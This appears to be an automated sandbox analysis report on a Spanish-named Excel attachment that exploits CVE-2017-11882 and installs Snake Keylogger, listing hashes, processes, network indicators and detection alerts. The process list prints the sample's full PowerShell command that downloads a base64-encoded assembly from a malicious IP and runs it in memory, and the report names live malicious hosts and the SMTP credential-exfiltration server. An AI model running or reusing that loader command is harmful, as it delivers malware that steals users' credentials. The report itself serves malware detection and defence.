File name:

Solicitud de cotizaciòn..xlsx

Full analysis: https://app.any.run/tasks/440d4e74-553a-4531-8451-f7f6bda138f4
Verdict: Malicious activity
Analysis date: December 05, 2022, 19:04:52
OS: Windows 7 Professional Service Pack 1 (build: 7601, 64 bit)
Tags:
exploit
cve-2017-11882
trojan
opendir
evasion
snake
keylogger
Indicators:
MIME: application/vnd.openxmlformats-officedocument.spreadsheetml.sheet
File info: Microsoft Excel 2007+
MD5:

CD9567E232B722B34985981E32633321

SHA1:

3B1FDB9DACD8A1F20FDC0F03D2088855924452A7

SHA256:

7AE8B3795F2EFFF6E153B1290633C327A5D3ADE19F40ECC0A891579ED5587C61

SSDEEP:

24576:Cmv7PSn7ViMIY4oSX6fM1lPH/VE+njnkLQp:CmMVHfSlPHJngEp

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Suspicious connection from the Equation Editor

      • EQNEDT32.EXE (PID: 2748)
    • Equation Editor starts application (CVE-2017-11882)

      • EQNEDT32.EXE (PID: 2748)
    • Application was injected by another process

      • svchost.exe (PID: 872)
      • svchost.exe (PID: 896)
      • svchost.exe (PID: 496)
      • SearchIndexer.exe (PID: 2044)
    • Runs injected code in another process

      • powercfg.exe (PID: 3044)
      • rundll32.exe (PID: 2332)
    • Unusual connection from system programs

      • RegAsm.exe (PID: 2316)
    • Creates a writable file the system directory

      • powercfg.exe (PID: 3044)
    • SNAKE detected by memory dumps

      • RegAsm.exe (PID: 2316)
    • SNAKEKEYLOGGER was detected

      • RegAsm.exe (PID: 2316)
    • Loads the Task Scheduler COM API

      • rundll32.exe (PID: 2332)
    • Steals credentials from Web Browsers

      • RegAsm.exe (PID: 2316)
  • SUSPICIOUS

    • Reads settings of System Certificates

      • EQNEDT32.EXE (PID: 2748)
    • Connects to the server without a host name

      • powershell.exe (PID: 2908)
    • Reads the Internet Settings

      • EQNEDT32.EXE (PID: 2748)
      • RegAsm.exe (PID: 2316)
    • Checks Windows Trust Settings

      • EQNEDT32.EXE (PID: 2748)
    • Reads security settings of Internet Explorer

      • EQNEDT32.EXE (PID: 2748)
    • Executes as Windows Service

      • powercfg.exe (PID: 3044)
      • vssvc.exe (PID: 1292)
      • rundll32.exe (PID: 2332)
      • lpremove.exe (PID: 2812)
    • Executes PowerShell scripts

      • WScript.exe (PID: 1736)
    • Executes scripts

      • EQNEDT32.EXE (PID: 2748)
    • Removes files from Windows the directory

      • powercfg.exe (PID: 3044)
      • mcbuilder.exe (PID: 2976)
      • rundll32.exe (PID: 2332)
    • Reads Microsoft Outlook installation path

      • powercfg.exe (PID: 3044)
    • Searches for installed software

      • rundll32.exe (PID: 2332)
  • INFO

    • Checks supported languages

      • EQNEDT32.EXE (PID: 2748)
      • RegAsm.exe (PID: 2316)
    • Reads the computer name

      • EQNEDT32.EXE (PID: 2748)
      • RegAsm.exe (PID: 2316)
    • Checks proxy server information

      • EQNEDT32.EXE (PID: 2748)
    • Reads Environment values

      • RegAsm.exe (PID: 2316)
    • Creates a file in a temporary directory

      • powershell.exe (PID: 2908)
    • Reads security settings of Internet Explorer

      • powershell.exe (PID: 2908)
    • Creates files in the Windows directory

      • powercfg.exe (PID: 3044)
      • rundll32.exe (PID: 2332)
      • mcbuilder.exe (PID: 2976)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

SnakeKeylogger

(PID) Process(2316) RegAsm.exe
Credentials
Port587
Hostkeefort.com.ec
ProtocolSMTP
No Malware configuration.

TRiD

.xlsx | Excel Microsoft Office Open XML Format document (61.2)
.zip | Open Packaging Conventions container (31.5)
.zip | ZIP compressed archive (7.2)
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
58
Monitored processes
16
Malicious processes
8
Suspicious processes
1

Behavior graph

Click at the process to see the details
start inject inject inject inject excel.exe no specs eqnedt32.exe DllHost.exe no specs powercfg.exe no specs svchost.exe wscript.exe no specs powershell.exe regasm.exe no specs #SNAKE regasm.exe rundll32.exe no specs lpremove.exe no specs mcbuilder.exe no specs vssvc.exe no specs svchost.exe svchost.exe searchindexer.exe

Process information

PID
CMD
Path
Indicators
Parent process
2424"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /ddeC:\Program Files\Microsoft Office\Office14\EXCEL.EXEExplorer.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Version:
14.0.4756.1000
Modules
Images
c:\program files\microsoft office\office14\excel.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
2748"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -EmbeddingC:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
svchost.exe
User:
admin
Company:
Design Science, Inc.
Integrity Level:
MEDIUM
Description:
Microsoft Equation Editor
Exit code:
0
Version:
00110900
Modules
Images
c:\program files\common files\microsoft shared\equation\eqnedt32.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\wow64win.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll
2324C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}C:\Windows\system32\DllHost.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
COM Surrogate
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\dllhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
3044C:\Windows\System32\powercfg.exe -energy -autoC:\Windows\System32\powercfg.exeservices.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Power Settings Command-Line Tool
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\powercfg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
872C:\Windows\system32\svchost.exe -k DcomLaunchC:\Windows\system32\svchost.exe
services.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\umpnpmgr.dll
c:\windows\system32\spinf.dll
c:\windows\system32\user32.dll
1736"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Roaming\greeee.vbs" C:\Windows\SysWOW64\WScript.exeEQNEDT32.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
Modules
Images
c:\windows\syswow64\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll
2908"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string((New-Object Net.WebClient).DownloadString('http://4.204.233.44/DLL/NoStartUp.ppam'));[System.AppDomain]::CurrentDomain.Load($rOWg).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('txt.sdkgajsasjkkgjsfddvfsdvn/42.021.871.591//:ptth'))C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
WScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\wow64win.dll
c:\windows\syswow64\ntdll.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll
764"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft .NET Assembly Registration Utility
Exit code:
4294967295
Version:
4.7.2558.0 built by: NET471REL1
Modules
Images
c:\windows\microsoft.net\framework\v4.0.30319\regasm.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
2316"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft .NET Assembly Registration Utility
Version:
4.7.2558.0 built by: NET471REL1
Modules
Images
c:\windows\microsoft.net\framework\v4.0.30319\regasm.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\mscoree.dll
c:\windows\system32\user32.dll
SnakeKeylogger
(PID) Process(2316) RegAsm.exe
Credentials
Port587
Hostkeefort.com.ec
ProtocolSMTP
2332C:\Windows\system32\rundll32.exe /d srrstr.dll,ExecuteScheduledSPPCreationC:\Windows\system32\rundll32.exeservices.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows host process (Rundll32)
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\ntdll.dll
c:\windows\system32\rundll32.exe
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\imagehlp.dll
Total events
19 028
Read events
18 674
Write events
350
Delete events
4

Modification events

(PID) Process:(2424) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Operation:writeName:|k:
Value:
7C6B3A0078090000010000000000000000000000
(PID) Process:(2424) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
Off
(PID) Process:(2424) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1041
Value:
Off
(PID) Process:(2424) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1042
Value:
Off
(PID) Process:(2424) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1046
Value:
Off
(PID) Process:(2424) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1036
Value:
Off
(PID) Process:(2424) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1031
Value:
Off
(PID) Process:(2424) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1040
Value:
Off
(PID) Process:(2424) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1049
Value:
Off
(PID) Process:(2424) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:3082
Value:
Off
Executable files
0
Suspicious files
145
Text files
6
Unknown types
96

Dropped files

PID
Process
Filename
Type
2424EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVRE37C.tmp.cvr
MD5:
SHA256:
2324DllHost.exeC:\Users\admin\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat
MD5:
SHA256:
3044powercfg.exeC:\ProgramData\Microsoft\Windows\Power Efficiency Diagnostics\energy-ntkl.etl
MD5:
SHA256:
2908powershell.exeC:\Users\admin\AppData\Local\Temp\jtxhwtdd.rma.psm1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
2908powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivedbf
MD5:446DD1CF97EABA21CF14D03AEBC79F27
SHA256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
2748EQNEDT32.EXEC:\Users\admin\AppData\Roaming\greeee.vbstext
MD5:AB3FE7A67DDD142A9BAA136EF4125704
SHA256:84A64183C0D06A0A6AC7D9B431E843F74BEAC457F5561D12D58B349AE6F9035C
2324DllHost.exeC:\Users\admin\AppData\Local\Microsoft\Windows\WebCache\V01.chkbinary
MD5:3DA00FFBA5690F6AF13370F00CAE5A17
SHA256:FD0449A09A4627216BFABE3DB5243B0DB1818F01ACD3E617AD075668D5D3D011
2748EQNEDT32.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\K78MRVB5\cousinsnkfridayPayload[1].vbstext
MD5:AB3FE7A67DDD142A9BAA136EF4125704
SHA256:84A64183C0D06A0A6AC7D9B431E843F74BEAC457F5561D12D58B349AE6F9035C
2324DllHost.exeC:\Users\admin\AppData\Local\Microsoft\Windows\WebCache\V01.logbinary
MD5:5E3C6B74D1FD73C5D74C3871945A55DB
SHA256:B6CB57DE1A5EBF078CFCD4EBC2630DB260D2F2A377D0AEA280B603DC0E8A8CF9
2976mcbuilder.exeC:\Windows\rescache\wip\Segment0.cmfbinary
MD5:68B35CF25AE98FD9B310DF7132450024
SHA256:62F5CF8173B64216ACF11ACC1F291FCDFBE25FFEBD5B83FDA80DD516D0DDA527
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
4
TCP/UDP connections
5
DNS requests
3
Threats
13

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2908
powershell.exe
GET
200
195.178.120.24:80
http://195.178.120.24/nvdsfvddfsjgkkjsasjagkds.txt
unknown
text
168 Kb
malicious
2316
RegAsm.exe
GET
200
158.101.44.242:80
http://checkip.dyndns.org/
US
html
104 b
shared
2908
powershell.exe
GET
200
4.204.233.44:80
http://4.204.233.44/DLL/NoStartUp.ppam
US
text
12.0 Kb
malicious
2908
powershell.exe
GET
200
4.204.233.44:80
http://4.204.233.44/Rump/Rump.xls
US
text
53.1 Kb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2748
EQNEDT32.EXE
142.250.185.202:443
firebasestorage.googleapis.com
GOOGLE
US
whitelisted
2316
RegAsm.exe
158.101.44.242:80
checkip.dyndns.org
ORACLE-BMC-31898
US
malicious
2908
powershell.exe
4.204.233.44:80
MICROSOFT-CORP-MSN-AS-BLOCK
US
malicious
2908
powershell.exe
195.178.120.24:80
Delis LLC
US
malicious
2316
RegAsm.exe
88.99.90.21:587
keefort.com.ec
Hetzner Online GmbH
DE
malicious

DNS requests

Domain
IP
Reputation
firebasestorage.googleapis.com
  • 142.250.185.202
  • 172.217.18.10
  • 172.217.16.202
  • 142.250.185.170
  • 172.217.23.106
  • 142.250.184.202
  • 142.250.186.138
  • 142.250.185.234
  • 142.250.185.74
  • 142.250.185.138
  • 142.250.181.234
  • 142.250.185.106
  • 142.250.186.42
  • 142.250.186.170
  • 172.217.16.138
  • 142.250.184.234
whitelisted
checkip.dyndns.org
  • 158.101.44.242
  • 193.122.130.0
  • 132.226.247.73
  • 132.226.8.169
  • 193.122.6.168
shared
keefort.com.ec
  • 88.99.90.21
malicious

Threats

PID
Process
Class
Message
2908
powershell.exe
A Network Trojan was detected
ET TROJAN Powershell commands sent B64 2
2908
powershell.exe
Misc activity
ET POLICY EXE Base64 Encoded potential malware
2908
powershell.exe
Potentially Bad Traffic
ET INFO Dotted Quad Host XLS Request
2908
powershell.exe
Potentially Bad Traffic
ET INFO Terse Request for .txt - Likely Hostile
2908
powershell.exe
A Network Trojan was detected
ET CURRENT_EVENTS Unknown EK Landing Feb 16 2015 b64 1 M1
Misc activity
ET INFO DYNAMIC_DNS Query to *.dyndns. Domain
Misc activity
AV INFO Query to checkip.dyndns. Domain
2316
RegAsm.exe
Potential Corporate Privacy Violation
ET POLICY External IP Lookup - checkip.dyndns.org
2316
RegAsm.exe
Generic Protocol Command Decode
SURICATA Applayer Detect protocol only one direction
4 ETPRO signatures available at the full report
No debug info